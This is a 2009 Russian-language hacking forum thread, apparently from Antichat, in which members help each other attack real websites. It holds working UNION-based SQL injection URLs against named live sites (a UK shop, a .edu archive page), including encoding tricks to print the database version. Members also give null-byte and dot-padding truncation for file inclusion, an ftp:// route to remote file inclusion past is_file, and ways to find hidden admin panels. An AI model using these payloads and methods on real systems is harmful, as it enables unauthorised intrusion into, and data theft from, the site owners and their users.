Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. VITАL

    VITАL Elder - Старейшина

    Joined:
    19 Aug 2008
    Messages:
    1
    Likes Received:
    25
    Reputations:
    10
    IDW, DrAssault
    нету там скули
     
  2. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Ну как же мы без тебя то не догадались у? Ошибка возникает из за того что значения лимита не может быть отрицательным вот и всё, естественно инъекцией и не пахло, я просто показал человеку как изменяется характер ошибки в результате тех или иных действий, хотелось чтобы он сам мозгами шевельнул, а не ты ему сказал, надеюсь это ясно!!!
     
    1 person likes this.
  3. КГБ

    КГБ New Member

    Joined:
    14 Apr 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Люди есть такая вот проблема:
    Если сайт шопа при попытке вывести багнутый столбец:
    http://www.*****.co.uk/cart.php?c=-99999245+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100--
    Меня редиректит на страничку с картинкой на которой написано:
    Sorry shop is turned off.
    Помогите, может есть какойто другой способ вывода?
    Спасибо
     
  4. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Вывод в тайтле

    http://www.groovycart.co.uk/cart.php?c=-9+union+select+1,version(),3,4,5,6,7,8,9,10,1,2,1,1,1,1,1,1,19,20,1,2,3,24,5,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,1,2,3,4,5,6,7,8,9,10,11,12,13--+
     
    #6664 ElteRUS, 16 Apr 2009
    Last edited: 16 Apr 2009
  5. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Тебе нужно обрезать error.htm..это можно обрезать нуль байтом..вот так
    Code:
    file.txt%00
    Если magic_quotes_gpc ON то тебе нужно юзать замену нулбайту..вот тут описание..http://forum.antichat.ru/thread98525.html Хотя тебе уже давали ссылку....а ты даже не обратил внимание..
    Запрос с заменой нул байта будем примерно таким
    Code:
    file.txt...258-266+ точек
    Где file.txt это любой файл в директории tmpl
    ЧИТАЙ
     
  6. Nosfer

    Nosfer New Member

    Joined:
    10 Jan 2007
    Messages:
    16
    Likes Received:
    1
    Reputations:
    0
    Code:
    http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,2382,2383,2384,2385/*
    где-то фильтр, пилит version() etc, на дает пробиться к from+information_schema
     
    1 person likes this.
  7. ILYAtirtir

    ILYAtirtir Elder - Старейшина

    Joined:
    25 Apr 2007
    Messages:
    142
    Likes Received:
    246
    Reputations:
    73
    http://www.western.edu/frontpage/archive.php?id=-931+union+select+1,unhex(hex(version())),2383,2384,2385/*
     
  8. Kraneg

    Kraneg Elder - Старейшина

    Joined:
    30 Aug 2008
    Messages:
    107
    Likes Received:
    97
    Reputations:
    21
    ILYAtirtir, хотя бы объяснили человеку почему так! =\
    Nosfer, это не фильтр... Это проблемы с кодировкой... Так иногда бывает =\ для устранения этого можно применить как выше написали:
    UNHEX(HEX(version())) ну или вместо version() что вы хотите вывести
    или
    AES_DECRYPT(AES_ENCRYPT(version(),1),1)
    А вообще почитайте SQL injection полный FAQ
    Некоторые вопросы отпадут =)
     
    #6668 Kraneg, 17 Apr 2009
    Last edited: 17 Apr 2009
    3 people like this.
  9. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    есть ссылка вида http://site.ru/file=123
    Подгружается фаил 123.txt
    Как можно попробовать PHP подгрузить?
    пробовал %00 он режет %0
    пробовал %25 ничего не происходит..
     
  10. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    мде, ты как себе это вообще представляешь?

    Это не режет %0 а маджик квотс он, поэтому ошибка появляется такая. Обход сдесь:
    https://forum.antichat.ru/thread98525.html

    если не вышло, то не судьба
     
    3 people like this.
  11. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Вообщем есть файл

    PHP:
    if(is_file($config['document_root'].'/templates/'.$config['template'].'/before.php')){
        include(
    $config['document_root'].'/templates/'.$config['template'].'/before.php');
    }
    перменные не опред..то есть их можно свободно передать...
    Тут возможен только инклуд при Magic OFF ибо функция is_file не уязвима к замене нулл байта...Риальне ли каким нить макаром обмануть is_file ?...
     
    #6671 DimOnOID, 18 Apr 2009
    Last edited: 18 Apr 2009
  12. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    da, ishi temu slipa pro obxod file_exists
    naskol'ko ya pomnyu ftp:// rabotaet s is_file, sledovatel'no RFI
     
    #6672 Spyder, 18 Apr 2009
    Last edited: 18 Apr 2009
    2 people like this.
  13. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    http://forum.antichat.ru/thread99589.html
     
    1 person likes this.
  14. <SlaVka>

    <SlaVka> Banned

    Joined:
    23 Mar 2009
    Messages:
    3
    Likes Received:
    0
    Reputations:
    0
    Войти в админку зная логин и айди адимина Реально? сайт на phpnuke
     
  15. DimOnOID

    DimOnOID Banned

    Joined:
    5 Dec 2006
    Messages:
    407
    Likes Received:
    126
    Reputations:
    4
    Нет ))..
     
  16. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    возник такой вопрос... каким образом можно найти админку сайта? т.е если стандартные пути не подходят (xxx.xx/admin.php, xxx.xx/login.php....)
     
  17. Iceangel_

    Iceangel_ Elder - Старейшина

    Joined:
    9 Jul 2006
    Messages:
    494
    Likes Received:
    532
    Reputations:
    158
    2 .:[melkiy]:.
    гугл, robots.txt, сканер структуры сайта (pelmeshko тотже)
     
  18. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    есть у мну этот pelmeshko =) я хз как его юзать %))
     
  19. razb

    razb Active Member

    Joined:
    24 Mar 2009
    Messages:
    658
    Likes Received:
    133
    Reputations:
    18
    _http://madnet.name/tools/madss/ вот это посмотри
     
    1 person likes this.
  20. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ну это попробуй, ридми в комплекте:

    Скачать
     
    1 person likes this.
Thread Status:
Not open for further replies.